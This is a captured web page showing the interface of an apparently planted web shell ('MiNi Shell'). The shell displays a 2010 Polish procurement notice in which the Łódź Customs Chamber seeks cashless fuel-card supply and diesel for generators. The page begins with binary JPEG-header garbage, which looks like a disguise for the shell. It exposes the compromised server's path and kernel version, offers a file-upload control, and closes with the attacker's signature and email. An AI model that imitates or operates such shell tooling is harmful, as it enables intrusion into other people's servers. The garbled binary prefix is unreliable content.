JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100219/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100219/47502-N-2010.html

<p class="kh_header"><b>Łódź: Przedmiotem zamówienia jest dostawa w formie bezgotówkowej paliw płynnych do pojazdów służbowych oraz dostawa oleju napędowego do agregatów prądotwórczych</b><br>
<b>Numer ogłoszenia: 47502 - 2010; data zamieszczenia: 19.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Celna w Łodzi , ul. Lodowa 97, 93-232 Łódź, woj. łódzkie, tel. 042 6388277, faks 042 6388354.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lodz.ic.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest dostawa w formie bezgotówkowej paliw płynnych do pojazdów służbowych oraz dostawa oleju napędowego do agregatów prądotwórczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa w formie bezgotówkowej paliw płynnych do pojazdów służbowych oraz dostawa oleju napędowego do agregatów prądotwórczych. Zamawiający podzielił przedmiot zamówienia na części (dwa zadania) i dopuszcza możliwość realizowania poszczególnych części przez różnych Wykonawców. Każdy Wykonawca może złożyć ofertę  na 1 część lub wszystkie 2 części. Zadanie 1
Dostawa przez okres 24 miesięcy w formie bezgotówkowej niżej wymienionych rodzajów i ilości produktów paliwowych do samochodów służbowych Izby Celnej:
1)	benzyny bezołowiowej Pb95 klasyfikowanej na podstawie PN-EN 228,
w ilości 66 000 litrów.
2)	oleju napędowego klasyfikowanego na podstawie PN-EN 590, 
w ilości 34 000 litrów.
Podane powyżej ilości są wielkościami szacunkowymi, które należy przyjąć jako założenia do wyceny oferty, zrealizowanie mniejszych bądź większych dostaw nie może być podstawą do roszczeń ze strony Wykonawcy wobec Zamawiającego.
Wymienione paliwa powinny spełniać wymagania jakościowe określone w rozporządzeniu Ministra Gospodarki z dnia 9 grudnia 2008r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz. U. Nr 221, poz. 1441).
Warunki realizacji zamówienia:
1)	Zamawiający będzie dokonywał tankowania w sieci stacji paliw Wykonawcy.
2)	Zakup paliw płynnych będzie odbywał się w formie bezgotówkowej, przy użyciu kart paliwowych, z których każda będzie posiadała swój niepowtarzalny kod i wydawana będzie na numer rejestracyjny samochodu służbowego Zamawiającego.
3)	Zamawiający zastrzega sobie możliwość dokonywania zakupu (w formie bezgotówkowej), dostępnych na stacji paliw Wykonawcy produktów i usług pozapaliwowych.
4)	Wykonawca wyda bezpłatnie w terminie 15 dni od zawarcia umowy karty umożliwiające dokonywanie zakupów bezgotówkowych u operatorów prowadzących stacje paliw Wykonawcy.
5)	Wydane karty paliwowe, dotyczące samochodów służbowych, będą ważne na terenie całego kraju, we wszystkich punktach dystrybucyjnych Wykonawcy obsługujących karty paliwowe, oraz otrzymają termin ważności na cały okres obowiązywania umowy.
6)	Wykonawca będzie zobowiązany do bezpłatnego wydania nowych kart paliwowych w przypadku zwiększenia taboru samochodowego Zamawiającego lub zmiany numeru rejestracyjnego pojazdów służbowych Zamawiającego.
7)	W przypadku utraty, zniszczenia lub kradzieży karty paliwowej Wykonawca wyda Zamawiającemu wtórnik karty paliwowej, po pisemnym zawiadomieniu i skierowaniu wniosku o wydanie karty do Wykonawcy.
8)	Wykonawca będzie zobowiązany do uruchomienia opcji obligującej kierowców Zamawiającego do podawania przy każdym tankowaniu stanu licznika kilometrów pojazdu.
9)	Faktury za transakcje dokonane z użyciem kart paliwowych będą wystawiane przez Wykonawcę dwa razy w miesiącu i wysłane Zamawiającemu wraz z  wydrukiem zestawienia transakcji zrealizowanych w danym okresie rozliczeniowym  zawierającym następujące informacje:
-	numer faktury
-	numer karty paliwowej
-	data transakcji
-	numer rejestracyjny pojazdu
-	nazwa produktu
-	ilość  i wartość zatankowanego paliwa
-	wartość netto i brutto innych artykułów i usług pozapaliwowych,
-	miejsce tankowania
10)	Wykonawca każdorazowo wyda osobie dokonującej zakupu potwierdzenie dokonania tankowania.
11)	Rozliczenie będzie dokonywane według cen detalicznych obowiązujących w dniu zakupu paliwa na danej stacji, z uwzględnieniem stałego, procentowego rabatu, określonego w ofercie.
12)	Płatności będą dokonywane przez Zamawiającego w ciągu 21 dni od daty wystawienia faktury przez Wykonawcę.
13)	Rozliczenia za dokonane transakcje następować będą na podstawie wystawianych faktur VAT, za okresy od 1 dnia do 15 dnia oraz za okres od 16 dnia do ostatniego dnia danego miesiąca z datą sprzedaży ostatniego dnia miesiąca.
14)	O zamówienie mogą ubiegać się Wykonawcy, którzy posiadają łącznie na terenie województwa łódzkiego min. 8 stacji zaopatrzonych w system bezgotówkowego zakupu paliw z użyciem kart paliwowych w tym
-	na terenie miasta Łodzi minimum 5,
-	na terenie miasta Piotrków Trybunalski minimum 1, 
oraz na terenie każdego z pozostałych województw - minimum 2 stacje zaopatrzone w system bezgotówkowego zakupu paliw z użyciem kart paliwowych.
Ilość pojazdów znajdujących się w dyspozycji Zamawiającego:
Zamawiający oświadcza, iż na dzień ogłoszenia postępowania przetargowego posiada 45 samochodów służbowych, w tym:
a)	pojazdy tankujące benzynę bezołowiową Pb 95 - 31 szt.,
b)	pojazdy tankujące olej napędowy - 14 szt.
Zamawiający zastrzega sobie możliwość zmiany, w trakcie realizacji umowy, rodzaju i ilości samochodów służbowych objętych umową, na skutek ewentualnych zmian związanych ze zmniejszeniem lub zwiększeniem taboru samochodowego, należącego do Izby Celnej w Łodzi.
Zadanie 2
Dostawa oleju napędowego klasyfikowanego na podstawie PN-EN 590 do agregatów prądotwórczych w ilości 3 000 litrów w okresie 24 miesięcy od dnia podpisania umowy.
Podana powyżej ilość jest wielkością szacunkową, którą należy przyjąć jako założenia do wyceny oferty, zrealizowanie mniejszych bądź większych dostaw nie może być podstawą do roszczeń ze strony Wykonawcy wobec Zamawiającego.

Wymienione paliwo powinno spełniać wymagania jakościowe określone w rozporządzeniu Ministra Gospodarki z dnia 9 grudnia 2008r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz. U. Nr 221, poz. 1441).
Warunki realizacji zamówienia:
1)	Dostawa oleju napędowego do agregatów prądotwórczych odbywać się będzie na podstawie zgłoszenia i w miejsce wskazane przez Zamawiającego. Wykonawca zobowiązany będzie zapewnić transport do miejsca wskazanego i posiadać urządzenie umożliwiające zatankowanie paliwa do agregatorów prądotwórczych. Koszty transportu pokrywa Wykonawca.
2)	Wykonawca zrealizuje jednostkową dostawę w terminie 3 (trzech) dni roboczych, liczonych od dnia otrzymania zamówienia złożonego
 faxem / drogą elektroniczną.
3)	Rozliczenie nastąpi według obowiązującej w dniu dostawy ceny hurtowej oleju napędowego producenta bazowego powiększonej o marżę Wykonawcy.
4)	Płatność z tytułu zakupu paliwa do agregatów prądotwórczych odbywać się będzie na podstawie faktury wystawionej przez Wykonawcę.
5)	Wykonawca zobowiązany będzie do dostarczenia Zamawiającemu, orzeczenia laboratoryjnego do każdej dostawy oleju napędowego
6)	Zamawiający zastrzega sobie prawo do zwiększenia ilości agregatów prądotwórczych, do których następować będzie dostawa oleju napędowego.
Ilość agregatów prądotwórczych znajdujących się w dyspozycji Zamawiającego:
1) agregaty prądotwórcze zasilane olejem napędowym - 2 szt w tym:
a)	1 szt - ul. Karolewska 41 w Łodzi,
b)	1 szt - ul. Lodowa 97 w Łodzi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 09.13.21.00-4, 09.13.41.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca udokumentuje posiadanie ważnej koncesji lub zezwolenia na obrót paliwami płynnymi objętymi przedmiotem zamówienia oraz złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1. Ocena spełniania warunków dokonywana będzie zgodnie z formułą słełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena spełniania warunków dokonywana będzie zgodnie z formułą słełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena spełniania warunków dokonywana będzie zgodnie z formułą słełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena spełniania warunków dokonywana będzie zgodnie z formułą słełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena spełniania warunków dokonywana będzie zgodnie z formułą słełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lodz.ic.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Izba Celna w Łodzi, ul. Lodowa 97, 93-232 Łódź.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2010 godzina 11:00, miejsce: Kancelaria Izby Celnej, ul. Lodowa 97, 93-232 Łódź.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa przez okres 24 miesięcy w formie bezgotówkowej produktów paliwowych do samochodów służbowych Izby Celnej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa przez okres 24 miesięcy w formie bezgotówkowej niżej wymienionych rodzajów i ilości produktów paliwowych do samochodów służbowych Izby Celnej:
1)	benzyny bezołowiowej Pb95 klasyfikowanej na podstawie PN-EN 228,
w ilości 66 000 litrów.
2)	oleju napędowego klasyfikowanego na podstawie PN-EN 590, 
w ilości 34 000 litrów.
Podane powyżej ilości są wielkościami szacunkowymi, które należy przyjąć jako założenia do wyceny oferty, zrealizowanie mniejszych bądź większych dostaw nie może być podstawą do roszczeń ze strony Wykonawcy wobec Zamawiającego.

Wymienione paliwa powinny spełniać wymagania jakościowe określone w rozporządzeniu Ministra Gospodarki z dnia 9 grudnia 2008r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz. U. Nr 221, poz. 1441).

Warunki realizacji zamówienia:

1)	Zamawiający będzie dokonywał tankowania w sieci stacji paliw Wykonawcy.
2)	Zakup paliw płynnych będzie odbywał się w formie bezgotówkowej, przy użyciu kart paliwowych, z których każda będzie posiadała swój niepowtarzalny kod i wydawana będzie na numer rejestracyjny samochodu służbowego Zamawiającego.
3)	Zamawiający zastrzega sobie możliwość dokonywania zakupu (w formie bezgotówkowej), dostępnych na stacji paliw Wykonawcy produktów i usług pozapaliwowych.
4)	Wykonawca wyda bezpłatnie w terminie 15 dni od zawarcia umowy karty umożliwiające dokonywanie zakupów bezgotówkowych u operatorów prowadzących stacje paliw Wykonawcy.
5)	Wydane karty paliwowe, dotyczące samochodów służbowych, będą ważne na terenie całego kraju, we wszystkich punktach dystrybucyjnych Wykonawcy obsługujących karty paliwowe, oraz otrzymają termin ważności na cały okres obowiązywania umowy.
6)	Wykonawca będzie zobowiązany do bezpłatnego wydania nowych kart paliwowych w przypadku zwiększenia taboru samochodowego Zamawiającego lub zmiany numeru rejestracyjnego pojazdów służbowych Zamawiającego.
7)	W przypadku utraty, zniszczenia lub kradzieży karty paliwowej Wykonawca wyda Zamawiającemu wtórnik karty paliwowej, po pisemnym zawiadomieniu i skierowaniu wniosku o wydanie karty do Wykonawcy.
8)	Wykonawca będzie zobowiązany do uruchomienia opcji obligującej kierowców Zamawiającego do podawania przy każdym tankowaniu stanu licznika kilometrów pojazdu.
9)	Faktury za transakcje dokonane z użyciem kart paliwowych będą wystawiane przez Wykonawcę dwa razy w miesiącu i wysłane Zamawiającemu wraz z  wydrukiem zestawienia transakcji zrealizowanych w danym okresie rozliczeniowym  zawierającym następujące informacje:
-	numer faktury
-	numer karty paliwowej
-	data transakcji
-	numer rejestracyjny pojazdu
-	nazwa produktu
-	ilość  i wartość zatankowanego paliwa
-	wartość netto i brutto innych artykułów i usług pozapaliwowych,
-	miejsce tankowania
10)	Wykonawca każdorazowo wyda osobie dokonującej zakupu potwierdzenie dokonania tankowania.
11)	Rozliczenie będzie dokonywane według cen detalicznych obowiązujących w dniu zakupu paliwa na danej stacji, z uwzględnieniem stałego, procentowego rabatu, określonego w ofercie.
12)	Płatności będą dokonywane przez Zamawiającego w ciągu 21 dni od daty wystawienia faktury przez Wykonawcę.
13)	Rozliczenia za dokonane transakcje następować będą na podstawie wystawianych faktur VAT, za okresy od 1 dnia do 15 dnia oraz za okres od 16 dnia do ostatniego dnia danego miesiąca z datą sprzedaży ostatniego dnia miesiąca.
14)	O zamówienie mogą ubiegać się Wykonawcy, którzy posiadają łącznie na terenie województwa łódzkiego min. 8 stacji zaopatrzonych w system bezgotówkowego zakupu paliw z użyciem kart paliwowych w tym
-	na terenie miasta Łodzi minimum 5,
-	na terenie miasta Piotrków Trybunalski minimum 1, 
oraz na terenie każdego z pozostałych województw - minimum 2 stacje zaopatrzone w system bezgotówkowego zakupu paliw z użyciem kart paliwowych.

Ilość pojazdów znajdujących się w dyspozycji Zamawiającego.

Zamawiający oświadcza, iż na dzień ogłoszenia postępowania przetargowego posiada 45 samochodów służbowych, w tym:
a)	pojazdy tankujące benzynę bezołowiową Pb 95 - 31 szt.,
b)	pojazdy tankujące olej napędowy - 14 szt.
	
Zamawiający zastrzega sobie możliwość zmiany, w trakcie realizacji umowy, rodzaju i ilości samochodów służbowych objętych umową, na skutek ewentualnych zmian związanych ze zmniejszeniem lub zwiększeniem taboru samochodowego, należącego do Izby Celnej w Łodzi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.13.21.00-4, 09.13.41.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa oleju napędowego klasyfikowanego na podstawie PN-EN 590 do agregatów prądotwórczych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa oleju napędowego klasyfikowanego na podstawie PN-EN 590 do agregatów prądotwórczych w ilości 3 000 litrów w okresie 24 miesięcy od dnia podpisania umowy.
Podana powyżej ilość jest wielkością szacunkową, którą należy przyjąć jako założenia do wyceny oferty, zrealizowanie mniejszych bądź większych dostaw nie może być podstawą do roszczeń ze strony Wykonawcy wobec Zamawiającego.

Wymienione paliwo powinno spełniać wymagania jakościowe określone w rozporządzeniu Ministra Gospodarki z dnia 9 grudnia 2008r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz. U. Nr 221, poz. 1441).
Warunki realizacji zamówienia:
1)	Dostawa oleju napędowego do agregatów prądotwórczych odbywać się będzie na podstawie zgłoszenia i w miejsce wskazane przez Zamawiającego. Wykonawca zobowiązany będzie zapewnić transport do miejsca wskazanego i posiadać urządzenie umożliwiające zatankowanie paliwa do agregatorów prądotwórczych. Koszty transportu pokrywa Wykonawca.
2)	Wykonawca zrealizuje jednostkową dostawę w terminie 3 (trzech) dni roboczych, liczonych od dnia otrzymania zamówienia złożonego
 faxem / drogą elektroniczną.
3)	Rozliczenie nastąpi według obowiązującej w dniu dostawy ceny hurtowej oleju napędowego producenta bazowego powiększonej o marżę Wykonawcy.
4)	Płatność z tytułu zakupu paliwa do agregatów prądotwórczych odbywać się będzie na podstawie faktury wystawionej przez Wykonawcę.
5)	Wykonawca zobowiązany będzie do dostarczenia Zamawiającemu, orzeczenia laboratoryjnego do każdej dostawy oleju napędowego
6)	Zamawiający zastrzega sobie prawo do zwiększenia ilości agregatów prądotwórczych, do których następować będzie dostawa oleju napędowego.
Ilość agregatów prądotwórczych znajdujących się w dyspozycji Zamawiającego:
1) agregaty prądotwórcze zasilane olejem napędowym - 2 szt w tym:
a)	1 szt - ul. Karolewska 41 w Łodzi,
b)	1 szt - ul. Lodowa 97 w Łodzi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.13.41.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com